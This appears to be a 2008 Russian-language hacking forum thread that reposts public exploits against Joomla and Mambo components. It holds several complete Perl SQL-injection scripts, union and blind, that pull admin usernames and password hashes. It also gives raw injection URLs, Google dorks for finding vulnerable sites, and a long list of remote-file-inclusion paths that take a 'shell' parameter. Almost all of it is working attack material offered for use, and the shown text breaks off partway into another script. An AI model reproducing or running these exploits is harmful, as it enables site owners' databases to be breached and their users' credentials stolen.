#[*] Founded by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
#[*] Dork inurl:"index.php?option=com_xsstream-dm"
#[*] Greetz : CoNaN & HaCkeR_EgY & All friends & All muslims HaCkeRs :)

########################################
#[*] Script_Name: "Joomla"
#[*] Component_Name: "xsstream-dm" 0.01 Beta
########################################

print "\t\t########################################################\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Joomla Component (xsstream-dm) Remote SQL Injection #\n\n";
print "\t\t# by Houssamix & Stack-Terrorist #\n\n";
print "\t\t# from H-T Team & v4 Team #\n\n";
print "\t\t########################################################\n\n";

use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$tab="jos_users";
#the the union of joomla
$un="/**/union/**/select/**/";
#the vulnerable compenent
$com="com_xsstream-dm&Itemid";
# Lets star exploiting
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$user.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<div class="contentpagetitle">(.*?)<\/div>/){
       
        print "\n[+] Admin User : $1";
}
$host2 = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$pass.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";

$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;

if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t# Exploit has ben aported user and password hash #\n\n";
}

else{print "\n[-] Exploit Failed...\n";}

# exploit discovered by Houssamix From H-T Team
# exploit exploited by Stack-Terrorist
(c) by Houssamix & Stack-Terrorist

baltazar 19.05.2008 19:05
Joomla Component com_galeria Remote SQL Injection Vulnerability
Код:
###############################################################
#
# joomla SQL Injection(com_galeria)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "com_galeria"
#
# DORK 2 : allinurl: id "com_galeria"
#
################################################################
EXPLOIT :

index.php?option=com_galeria&Itemid=S@BUN&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,username/**/from/**/users/*

################################################################
# S@BUN                  i AM NOT HACKER                S@BUN
################################################################

vp$ 21.05.2008 10:49
Раскрытие префикса таблиц в компоненте datsogallery
есои при обращении к старнице
Цитата:
http://www.domain.ru/path/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
позвращается цифра, то при повторном обращении к странице, она выплюнет ошибку
Цитата:
DB function failed with error number 1062
Duplicate entry '1-83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' for key 1 SQL=INSERT INTO jos_datsogallery_votes ( vpic, vip ) VALUES ( 1, '83.142.***.***83.142.***.***Opera/9.27 (Windows NT 5.1; U; ru)' )
работает не на всех версиях
пример _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1

+toxa+ 21.05.2008 17:48
Цитата:
Сообщение от vp$
Раскрытие префикса таблиц в компоненте datsogallery
есои при обращении к старнице

позвращается цифра, то при повторном обращении к странице, она выплюнет ошибку

работает не на всех версиях
пример _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
Эм... Как бы ты этом и основан мой эксплойт=\ Только префикс у меня не играет роли, ибо #__ заменяется на текущий префикс при обработке его соответствующей функцией в джумле

baltazar 23.05.2008 20:21
Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability
Код:
###############################################################
#
# joomla com_garyscookbook SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
#    there are alot site but exploit not working for all ı found alot
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################################
EXPLOIT :

index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*


################################################################
# S@BUN            i AM NOT HACKER              S@BUN
################################################################

  <name>garyscookbook</name>
  <creationDate>4-9-2005</creationDate>
  <author>Gerald Berger</author>
  <copyright>This component is released under the GNU/GPL License</copyright>
  <authorEmail>gerald@vb-dozent.net</authorEmail>

  <authorUrl>www.vb-dozent.net</authorUrl>
  <version>1.1.1</version>
  <description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>

it's my 29.05.2008 09:15
нашел у себя на компе, хз может баян
Код:
inurl:"com_flyspray"

Site Sonuna:

/components/com_flyspray/startdown.php?file=shell



Google Dork:

inurl:"com_admin"

Site Sonuna:

administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell



Google Dork:

inurl:index.php?option=com_simpleboard

Site Sonuna:

/components/com_simpleboard/file_upload.php?sbp=shell


Google Dork:
inurl:"com_hashcash"

Site Sonuna:

/components/com_hashcash/server.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_htmlarea3_xtd-c"

Code:

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_sitemap"

Code:

/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_performs"

Site Sonuna:
components/com_performs/performs.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_forum"

Site Sonuna:
/components/com_forum/download.php?phpbb_root_path=



Google Dork:
inurl:"com_pccookbook"

Site Sonuna:

components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell



Google Dork:
inurl:index.php?option=com_extcalendar

Site Sonuna:

/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell


Google Dork:
inurl:"minibb"

Site Sonuna:
components/minibb/index.php?absolute_path=shell



Google Dork:
inurl:"com_smf"

Site Sonuna:
/components/com_smf/smf.php?mosConfig_absolute_path=
Site Sonuna2:
/modules/mod_calendar.php?absolute_path=shell



Google Dork:
inurl:"com_pollxt"

Site Sonuna:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell

Google Dork:
inurl:"com_loudmounth"

Site Sonuna:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_videodb"

Site Sonuna:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell



Google Dork:
inurl:index.php?option=com_pcchess

Site Sonuna:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_multibanners"

Site Sonuna:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_a6mambohelpdesk"

Site Sonuna:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell



Google Dork:
inurl:"com_colophon"

Site Sonuna:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_mgm"

Site Sonuna:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell

Google Dork:
inurl:"com_mambatstaff"

Site Sonuna:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_securityimages"

Site Sonuna:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell

Site Sonuna2:
/components/com_securityimages/lang.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_artlinks"

Site Sonuna:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_galleria"

Site Sonuna:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_akocomment"

Site Sonuna:
/akocomments.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_cropimage"

Site Sonuna:
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell



Google Dork:
inurl:"com_kochsuite"

Site Sonuna:
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_comprofiler"

Site Sonuna:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_zoom"

Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
Site Sonuna2:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_serverstat"

Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell



Google Dork:
inurl:"com_fm"

Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=shell




Google Dork:
inurl:com_mambelfish

Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell




Google Dork:
inurl:com_lmo


Site Sonuna:
components/com_lmo/lmo.php?mosConfig_absolute_path=shell





Google Dork:
inurl:com_linkdirectory


Site Sonuna:
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell




Google Dork:
inurl:com_mtree


Site Sonuna:
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell





Google Dork:
inurl:com_jim


Site Sonuna:
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell





Google Dork:
inurl:com_webring


Site Sonuna:
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell





Google Dork:
inurl:com_remository


Site Sonuna:
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=



Google Dork:
inurl:com_babackup


Site Sonuna:
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_lurm_constructor


Site Sonuna:
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell






Google Dork:
inurl:com_mambowiki


Site Sonuna:
components/com_mambowiki/ MamboLogin.php?IP=shell




Google Dork:
inurl:com_a6mambocredits


Site Sonuna:
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell






Google Dork:
inurl:com_phpshop


Site Sonuna:
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=shell






Google Dork:
inurl:com_cpg


Site Sonuna:
components/com_cpg/cpg.php?mosConfig_absolute_path=shell






Google Dork:
inurl:com_moodle


Site Sonuna:
components/com_moodle/moodle.php?mosConfig_absolute_path=shell




Google Dork:
inurl:com_extended_registration


Site Sonuna:
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=shell
Код:
Google Dork:
inurl:com_mospray


Site Sonuna:
components/com_mospray/scripts/admin.php?basedir=shell

Google Dork:
inurl:com_bayesiannaivefilter

Site Sonuna:
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_uhp

Site Sonuna:
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_peoplebook

Site Sonuna:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell

Google Dork:
inurl:com_mmp

Site Sonuna:
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell

Google Dork:
inurl:com_reporter

Site Sonuna:
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell

Google Dork:
inurl:com_madeira

Site Sonuna:
/components/com_madeira/img.php?url=shell


Google Dork:
inurl:com_jd-wiki

Site Sonuna:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell



Google Dork:
inurl:com_bsq_sitestats

Site Sonuna:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
Site Sonuna2:
/com_bsq_sitestats/external/rssfeed.php?baseDir=shell

Dork:

com_comprofiler

Expl:
administrator/components/com_comprofiler/plugin.class.
php?mosConfig_absolute_path=[Shell]



Dork:
inurl:com_multibanners

Expl:
/administrator/components/com_multibanners/extadminmenus.class.
php?mosConfig_absolute_path=[Shell]

Dork:
inurl:com_colophon

expl:
administrator/components/com_colophon/admin.colophon.
php?mosConfig_absolute_path=[Shell]


Dork:

inurl:index.php?option=[Shell]com_simpleboard

Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]

Dork:

inurl:"com_hashcash"


Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_htmlarea3_xtd-c"

Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.
php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_sitemap"

Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]

--
Dork:
inurl:"com_forum"

Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]
--
Dork:
inurl:"com_pccookbook"

Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_extcalendar

Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"minibb"

Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:"com_smf"

Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]


Expl:
/modules/mod_calendar.php?absolute_path=[Shell]

Dork:
inurl:"com_pollxt"

Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_loudmounth"

Expl:
/components/com_loudmounth/includes/abbc/abbc.class.
php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_videodb"

Expl:
/components/com_videodb/core/videodb.class.xml.
php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_pcchess

Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_multibanners"

Expl:
/administrator/components/com_multibanners/extadminmenus.class.
php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_a6mambohelpdesk"

Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.
php?mosConfig_live_site=[Shell]

Dork:
inurl:"com_colophon"

Expl:
/administrator/components/com_colophon/admin.colophon.
php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mgm"

Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mambatstaff"

Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_securityimages"

Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]

Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_artlinks"

Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_galleria"

Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]

~!DoK_tOR!~ 02.06.2008 15:37
Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit

Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "  #############################################################\n";
  print "  #  Joomla Component mycontent Blind SQL Injection Exploit  #\n";
  print "  #  Author:His0k4 [ALGERIAN HaCkeR]                        #\n";
  print "  #                                                          #\n";
  print "  #  Conctact: His0k4.hlm[at]gamil.com                      #\n";
  print "  #  Greetz:  All friends & muslims HacKeRs                #\n";
  print "  #  Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "  #                                                          #\n";
  print "  #  Usage:  perl mycontent.pl host path <options>          #\n";
  print "  #  Example: perl mycontent.pl www.host.com /joomla/ -r 10  #\n";
  print "  #                                                          #\n";
  print "  #  Options:                                                #\n";
  print "  #    -r    Valid  id                                      #\n";
  print "  #  Note:                                                  #\n";
  print "  #  If the exploit failed                                  #\n";
  print "  #  Change 'regexp' value to the title of the page          #\n";
  print "  #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $rid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "r=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"r"})
{
  $rid = $options{"r"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $rid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $rid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $rid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "E-mail";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2008-06-01]

Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit


Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "  #############################################################\n";
  print "  #  Joomla Component Joo!BB Blind SQL Injection Exploit    #\n";
  print "  #  Author:His0k4 [ALGERIAN HaCkeR]                        #\n";
  print "  #                                                          #\n";
  print "  #  Conctact: His0k4.hlm[at]gamil.com                      #\n";
  print "  #  Greetz:  All friends & muslims HacKeRs                #\n";
  print "  #  Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "  #                                                          #\n";
  print "  #  Usage:  perl jobb.pl host path <options>              #\n";
  print "  #  Example: perl jobb.pl www.host.com /joomla/ -f 1        #\n";
  print "  #                                                          #\n";
  print "  #  Options:                                                #\n";
  print "  #    -f    Forum  id                                      #\n";
  print "  #  Note:                                                  #\n";
  print "  #  If you need to change the match value so do it :D      #\n";
  print "  #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $fid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"f"})
{
  $fid = $options{"f"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $fid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $fid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $fid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Announcements";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2008-06-01]
milw0rm.com

baltazar 03.06.2008 01:11
Joomla Component acctexp <= 0.12.x Blind SQL Injection Ex
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "  #############################################################\n";
  print "  #  Joomla Component acctexp Blind SQL Injection Exploit    #\n";
  print "  #  Author:His0k4 [ALGERIAN HaCkeR]                        #\n";
  print "  #                                                          #\n";
  print "  #  Conctact: His0k4.hlm[at]gamil.com                      #\n";
  print "  #  Greetz:  All friends & muslims HacKeRs                #\n";
  print "  #  Greetz2:  http://www.palcastle.org/cc :)                #\n";
  print "  #                                                          #\n";
  print "  #  Usage:  perl acctexp.pl host path <options>            #\n";
  print "  #  Example: perl acctexp.pl www.host.com /joomla/ -g 1    #\n";
  print "  #                                                          #\n";
  print "  #  Options:                                                #\n";
  print "  #    -g    usage  id                                      #\n";
  print "  #  Note:                                                  #\n";
  print "  #  Don't forget to change the match if you have to do it :)#\n";
  print "  #############################################################\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $gid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "g=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"g"})
{
  $gid = $options{"g"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $gid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $gid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $rid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_acctexp&task=subscribe&usage=".$gid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "Verify Password";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

otmorozok428 04.06.2008 20:22
Joomla Component jotloader <= 1.2.1.a Blind SQL injection

Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                \n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  print "  o  Joomla Component jotloader Blind SQL Injection Exploit  o\n";
  print "  o  Author:His0k4 [ALGERIAN HaCkeR]                        o\n";
  print "  o                                                          o\n";
  print "  o  Conctact: His0k4.hlm[at]gamil.com                      o\n";
  print "  o  Greetz:  All friends & muslims HacKeRs                o\n";
  print "  o                                                          o\n";
  print "  o  Dork :  inurl:com_jotloader                            o\n";
  print "  o  Usage:  perl jotloader.pl host path <options>          o\n";
  print "  o  Example: perl jotloader.pl www.host.com /joomla/ -c 5  o\n";
  print "  o                                                          o\n";
  print "  o  Options:                                                o\n";
  print "  o    -c  valid cid  id                                    o\n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $cid    = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "c=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
  $userid = $options{"u"};
}

if($options{"c"})
{
  $cid = $options{"c"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $cid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $cid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid  = shift;
  my $cid  = shift;
  my $i    = shift;
  my $h    = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_jotloader&cid=".$cid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "files.download";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}
# milw0rm.com [2008-06-04]

ZAMUT 05.06.2008 15:37
Joomla Component EasyBook 1.1 SQL Injection Exploit
 
Joomla Component EasyBook 1.1 SQL Injection Exploit
Код:
#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example:                            #
# Host: artsbymonique.lu              #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+--                                                      --+-\n";
print "-+--            Author: ZAMUT                            --+-\n";
print "-+--            Vuln: gbid=                              --+-\n";
print "-+--            Dork: com_easybook                        --+-\n\n";

print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket  "POST /index.php HTTP/1.0\n".
              "Host: www.$host\n".
              "Content-Type: application/x-www-form-urlencoded\n".
              "Content-Length: 214\n\n".
              "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
  while(<$socket>)
  {
        $s = <$socket>;
        if($s=~/:::(.+):::/){
                  $lhs = $1;
                  ($l,$h,$s)=split(':',$lhs);
                  print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
                  close $socket;
                  exit; }
  }
  die ("Exploit failed!");
:) POST only

otmorozok428 05.06.2008 16:12
Joomla Component simpleshop <= 3.4 SQL injection

Цитата:
/---------------------------------------------------------------\
\ /
/ Joomla Component simpleshop Remote SQL injection \
\ /
\---------------------------------------------------------------/

[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_simpleshop[*] Dork : inurl:com_simpleshop "catid"
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid =29&catid={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid =29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user( ),user(),user(),user(),user() FROM jos_users--


------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
milw0rm.com [2008-06-05]

baltazar 08.06.2008 15:22
joomla Sql Injection Scanner V 1.0
 
http://beenuarora.com/code/joomsq.py

otmorozok428 08.06.2008 18:33
Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability

Код:
/---------------------------------------------------------------\
\                                                                /
/        Joomla Component GameQ Remote SQL injection          \
\                                                                /
\---------------------------------------------------------------/

[*] Author    :  His0k4 [ALGERIAN HaCkEr]
[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}
[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--

•†•SyTiNeR•†• 09.06.2008 14:15
Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit

Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                        \n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  print "  o  Joomla Component yvcomment Blind SQL Injection Exploit            o\n";
  print "  o  Author:His0k4 [ALGERIAN HaCkeR]                                  o\n";
  print "  o                                                                    o\n";
  print "  o  Conctact: His0k4.hlm[at]gamil.com                                o\n";
  print "  o  Greetz:  All friends & muslims HacKeRs                          o\n";
  print "  o                                                                    o\n";
  print "  o  Dork :  inurl:yvcomment                                          o\n";
  print "  o  Usage:  perl yvcomment.pl host path <options>                    o\n";
  print "  o  Example: perl yvcomment.pl www.host.com /joomla/ -a 2            o\n";
  print "  o                                                                    o\n";
  print "  o  Options:                                                          o\n";
  print "  o    -a  valid Article id                                          o\n";
  print "  o  Note:                                                            o\n";
  print "  o You can Change the match string by any content of the correct query o\n";
  print "  ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  exit;
}

